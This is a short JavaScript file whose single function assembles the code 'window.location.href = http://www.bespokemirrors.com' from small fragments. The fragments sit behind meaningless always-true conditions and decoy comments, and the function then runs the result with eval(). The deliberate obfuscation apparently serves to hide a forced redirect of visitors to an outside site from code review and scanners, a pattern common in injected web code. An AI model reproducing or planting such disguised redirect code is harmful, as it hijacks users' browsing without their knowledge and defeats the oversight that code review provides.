// JavaScript Document

function doThisOn() {
	s = "winx=wind";

	if ( "a" == "a" )
		s += "ow.";

	if ( "a" == "a" )
		s += "loca";

	if ( "a" == "a" )
		s += "tion";
	
	x = "";

	// Some comments here about xyz

	if ( "a" == "a" )
		x += "winx.hr";

	if ( "a" == "a" )
		x += "ef = " + " 'ht";

	if ( "a" == "a" )
		x += "tp";

	// Some comments here abotu http

	if ( "a" == "a" )
		x += ":";

	if ( "a" == "a" )
		x += "/";

	if ( "a" == "a" )
		x += "/";

	// Some comments here abotu http

	if ( "a" == "a" )
		x += "ww";


	if ( "a" == "a" )
		x += "w.";

	if ( "a" == "a" )
		x += "bespokemirrors";

	if ( "a" == "a" )
		x += ".";

	if ( "a" == "a" )
		x += "c";

	if ( "a" == "a" )
		x += "om'";

	eval ( s );
	eval ( x );

}